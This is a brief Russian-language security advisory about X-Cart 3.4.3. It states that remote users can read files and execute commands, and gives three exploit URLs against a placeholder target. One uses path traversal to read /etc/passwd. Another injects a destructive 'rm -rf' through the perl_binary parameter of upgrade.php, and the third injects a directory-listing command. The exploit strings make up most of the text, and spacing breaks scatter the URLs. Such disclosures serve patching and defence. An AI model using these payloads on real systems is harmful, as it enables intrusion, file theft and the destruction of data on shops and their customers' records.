Программа: X-Cart 3.4.3
Уязвимость обнаружена в X-Cart shopping software. Удаленный пользователь может просматривать файлы и выполнять произвольные команды на целевой системе.
1. http://[target]/customer/auth.php?config [General][shop_closed]=Y&shop_clos
ed_file= ../../../../../../../et c/passwd
2. http://[target]/admin/upgrade.php? prepatch_errorcode=1&patch_files[0][orig _
file] =VERSION&perl_binary=/bin/rm -rf &patch_exe=..
3. http://[target]/admin/general.php?mode =perlinfo&config[General][perl_binar y]=/bin/ls -lR ||
